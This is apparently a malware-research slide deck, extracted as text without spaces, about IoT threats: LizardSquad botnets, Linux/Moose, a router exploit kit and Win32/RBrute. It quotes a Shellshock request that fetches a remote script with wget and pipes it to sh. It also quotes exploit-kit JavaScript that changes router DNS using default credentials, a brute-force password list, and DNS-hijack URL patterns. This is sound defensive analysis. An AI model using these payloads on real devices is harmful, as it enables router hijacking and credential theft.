![Page 1: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/1.jpg)
.
![Page 2: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/2.jpg)
IoTorInternetof{Things,Threats}
![Page 3: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/3.jpg)
Thomas(@nyx__o)MalwareResearcheratESETCTFloverOpensourcecontributor
![Page 4: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/4.jpg)
Olivier(@obilodeau)SecurityResearcheratGoSecurePreviouslyMalwareResearcheratESETInfoseclectureratETSUniversityinMontrealInfosecdeveloper,networkadmin,linuxsystemadmin
Co-founderMontrehack(hands-onsecurityworkshops)FounderNorthSecHackerJeopardy
![Page 5: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/5.jpg)
AgendaAboutIOTLizardSquadLinux/MooseExploitKitWin32/RBruteConclusion
![Page 6: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/6.jpg)
![Page 7: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/7.jpg)
![Page 8: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/8.jpg)
![Page 9: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/9.jpg)
![Page 10: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/10.jpg)
![Page 11: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/11.jpg)
WhyItMatters?HardtodetectHardtoremediateHardtofixLowhangingfruitforbadguys
![Page 12: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/12.jpg)
ARealThreatSeveralcasesdisclosedinthelasttwoyearsAlotofsame-oldbackgroundnoise(DDoSer)Thingsareonlygettingworse
![Page 13: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/13.jpg)
![Page 14: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/14.jpg)
![Page 15: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/15.jpg)
![Page 16: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/16.jpg)
![Page 17: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/17.jpg)
![Page 18: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/18.jpg)
![Page 19: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/19.jpg)
Wait,isIoTmalwarereallyaboutthings?
![Page 20: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/20.jpg)
No.Notyet.No.Notyet.
![Page 21: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/21.jpg)
![Page 22: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/22.jpg)
![Page 23: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/23.jpg)
Sowhatkindofmalwarecanwefindonsuchinsecuredevices?
![Page 24: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/24.jpg)
LizardSquadLizardSquad
![Page 25: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/25.jpg)
![Page 26: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/26.jpg)
WhoareLizardSquad?BlackhathackinggroupLotsofDistributedDenialofService(DDoS)DDoSPlayStationNetworkandXboxliveinChristmas2014BombthreatsDDoSforhire(LizardStresser)
![Page 27: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/27.jpg)
DesCYBER-DesCYBER-CHENAPANS!CHENAPANS!
![Page 28: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/28.jpg)
![Page 29: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/29.jpg)
TheMalwareLinux/GafgytLinux/Powbot,Linux/Aidra,Kaiten,…Probablyothers,assourceispublic
![Page 30: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/30.jpg)
CaracteristicsTelnetscannerFlooding:UDP,TCP,JunkandHold
![Page 31: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/31.jpg)
SomeServerCode"*****************************************""*WELCOMETOTHEBALLPIT*""*Nowwith*refrigerator*support*""*****************************************"
![Page 32: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/32.jpg)
AttackVectorsShellshockSSHcredentialsbrute-forceTelnetcredentialsbrute-force
![Page 33: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/33.jpg)
ExempleofShellshockAttempt
GET/cgi-bin/authLogin.cgiHTTP/1.1Host:127.0.0.1Cache-Control:no-cacheConnection:Keep-AlivePragma:no-cacheUser-Agent:(){goo;};wget-qO-http://o.kei.su/qn|sh>/dev/null2>&1&
![Page 34: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/34.jpg)
OtherVariantsHTTPSsupportCloudFlareprotectionbypass
![Page 35: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/35.jpg)
![Page 36: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/36.jpg)
Sophisticated?LizardStresserdatabasewasleakedPasswordsinplaintext…
![Page 37: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/37.jpg)
IRCCommandandControl
-------Daychangedto08/25/15-------09:32-!-Thereare0usersand2085invisibleon1servers09:32-!-42unknownconnection(s)09:32-!-3channelsformed09:32-!-Ihave2085clientsand0servers09:32-!-20852119Currentlocalusers2085,max211909:32-!-20852119Currentglobalusers2085,max2119
![Page 38: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/38.jpg)
BotMasters12:56-!-Topicfor#Fazzix:1k12:56-!-Topicsetbyvoid<>(WedAug1909:58:452015)12:56[Users#Fazzix]12:56[~void][~void_][@bob1k][@Fazzix][Myutro]·12:56-!-Irssi:#Fazzix:Totalof5nicks(4ops,0halfops,0voices,1normal)12:56-!-Channel#FazzixcreatedMonAug1703:11:29201512:56-!-Irssi:Jointo#Fazzixwassyncedin2secs
![Page 39: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/39.jpg)
Linux/MooseLinux/Moose
![Page 40: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/40.jpg)
Linux/MooseDiscoveredinNovember2014Thoroughlyanalyzedinearly2015PublishedareportinlateMay2015
![Page 41: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/41.jpg)
MooseDNAakaMalwaredescription
Hangtight,thisisarecap
![Page 42: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/42.jpg)
Linux/Moose…Namedafterthestring"elan"presentinthemalware
executable
![Page 43: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/43.jpg)
Elan…?
![Page 44: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/44.jpg)
TheLotusElan
![Page 45: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/45.jpg)
ElánTheSlovakrockband(from1969andstillactive)
![Page 46: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/46.jpg)
![Page 47: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/47.jpg)
NetworkCapabilitiesPivotthroughfirewallsHome-madeNATtraversalCustom-madeProxyserviceonlyavailabletoasetofwhitelistedIPaddresses
Remotelyconfiguredgenericnetworksniffer
![Page 48: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/48.jpg)
![Page 49: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/49.jpg)
AttackVectorTelnetcredentialsbruteforceWordlistof304user/passentriessentbyserver
![Page 50: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/50.jpg)
CompromiseProtocol
![Page 51: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/51.jpg)
Anti-AnalysisStaticallylinkedbinarystrippedofitsdebuggingsymbolsHardtoreproduceenvironmentrequiredformalwaretooperateMisleadingstrings(getcool.com)
![Page 52: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/52.jpg)
![Page 53: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/53.jpg)
MooseHerdingTheMalwareOperation
![Page 54: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/54.jpg)
ViaC&CConfigurationNetworksnifferwasusedtostealHTTPCookiesTwitter:twll,twidFacebook:c_userInstagram:ds_user_idGoogle:SAPISID,APISIDGooglePlay/Android:LAY_ACTIVE_ACCOUNTYoutube:LOGIN_INFO
![Page 55: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/55.jpg)
ViaProxyUsageAnalysisNatureoftrafficProtocolTargetedsocialnetworks
![Page 56: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/56.jpg)
![Page 57: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/57.jpg)
![Page 58: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/58.jpg)
AnExample
![Page 59: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/59.jpg)
AnExample(cont.)
![Page 60: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/60.jpg)
AnExample(cont.)
![Page 61: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/61.jpg)
AnExample(cont.)
![Page 62: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/62.jpg)
Anti-TrackingProxyaccessisprotectedbyanIP-basedWhitelistSowecan’tusetheproxyservicetoevaluatemalwarepopulationBlindbecauseofHTTPSenforcedonsocialnetworks
![Page 63: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/63.jpg)
![Page 64: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/64.jpg)
AStrangeAnimalnotintheDDoSorbitcoinminingbusinessnox86variantfoundcontrolledbyasinglegroupofactors
![Page 65: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/65.jpg)
Status
![Page 66: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/66.jpg)
WhitepaperImpactFewweeksafterthepublicationtheC&CserverswentdarkAfterareboot,allaffecteddevicesshouldbecleanedButvictimscompromisedviaweakcredentials,sotheycanalwaysreinfect
![Page 67: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/67.jpg)
Aliveordead?
![Page 68: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/68.jpg)
Yay!Except…
![Page 69: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/69.jpg)
Linux/MooseUpdateNewsampleinSeptemberNewproxyserviceport(20012)NewC&CselectionalgorithmFewdifferencesStillunderscrutiny
![Page 70: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/70.jpg)
![Page 71: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/71.jpg)
![Page 72: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/72.jpg)
ExploitKitTargetingExploitKitTargetingRoutersRouters
![Page 73: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/73.jpg)
ExploitKitDefinitionAutomateexploitationTargetsbrowsersCommonexploitsareAdobeandJava
![Page 74: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/74.jpg)
source:Malwarebytes
![Page 75: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/75.jpg)
ExploitKitinAction
![Page 76: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/76.jpg)
ExploitKitinAction(cont.)
Cross-SiteRequestForgery(CSRF)Usesdefaultcredential(HTTP)ChangesprimaryDomainNameSystem(DNS)
![Page 77: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/77.jpg)
ExploitKitCSRF<html><head><scripttype="text/javascript"src<body><iframeid="iframe"sandbox="allow-same-origin"<scriptlanguage="javascript">
![Page 78: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/78.jpg)
ExploitKitHow-Tofunctione_belkin(ip){varmethod="POST";varurl="";vardata="";url="http://"+ip+"/cgi-bin/login.exe?pws=admin"exp(url,"","GET");url="http://"+ip+"/cgi-bin/setup_dns.exe";data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="exp(url,data,method);}
![Page 79: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/79.jpg)
ExploitKitcontinuallyimprovedObfuscationExploitsforCVEs
![Page 80: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/80.jpg)
ExploitKit-CVECVE-2015-1187D-LinkDIR-636LRemoteCommandInjectionIncorrectAuthentication
![Page 81: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/81.jpg)
RecapExploitKitChangeDNSFileless
![Page 82: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/82.jpg)
WhatCanTheyDo?UniversalXSSonallHTTPsitesfetchingJavascriptona3rdpartydomainPhishingAdfraud
![Page 83: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/83.jpg)
YouSaidAdfraud?InjectionviaGoogleanalyticsdomainhijackingJavascriptrunsincontextofeverypage
![Page 84: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/84.jpg)
ExempleofGoogleAnalyticsSubstitution'adcash':function(){varadcash=document.createElement('script'adcash.type='text/javascript';adcash.src='http://www.adcash.com/script/java.php?option=rotateur&r=274944'document.body.appendChild(adcash);},
![Page 85: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/85.jpg)
![Page 86: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/86.jpg)
Win32/RBrute(cont.)Triestofindadministrationwebpages(IP)ScanandreportRoutermodelisextractedfromtherealmattributeoftheHTTPauthentication
![Page 87: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/87.jpg)
Win32/RBruteTargets$stringsrbrute.exe[...]TD-W8901GTD-W8901GBTD-W8951NDTD-W8961NDTD-8840TTD-W8961NDTD-8816TD-8817TD-W8151NTD-W8101GZXDSL831CIIZXV10W300[...]DSL-2520UDSL-2600UDSLrouterTD-W8901GTD-W8901G3.0TD-W8901GBTD-W8951NDTD-W8961ND
![Page 88: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/88.jpg)
Win32/RBruteBruteforceLogins:admin,support,root&AdministratorPasswordlistretrievedfromtheCnC
<emptystring>1111111234512345612345678abc123adminAdministratorconsumerdragongizmodoiqrquksmletmeinlifehackmonkeypasswordqwertyrootsoporteETB2006support
![Page 89: IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses Remotely configured generic network sniffer. Attack Vector Telnet credentials bruteforce](https://reader033.vdocuments.us/reader033/viewer/2022041505/5e249f788e3c73626313acc9/html5/thumbnails/89.jpg)
Win32/RBruteChangingDNS
http://<router_IP>/&dnsserver=<malicious_DNS>&dnsserver2=8.8.8.8&Save=Savehttp://<router_IP>/dnscfg.cgi?dnsPrimary=<malicious_DNS>http://<router_IP>/Enable_DNSFollowing=1&dnsPrimary=
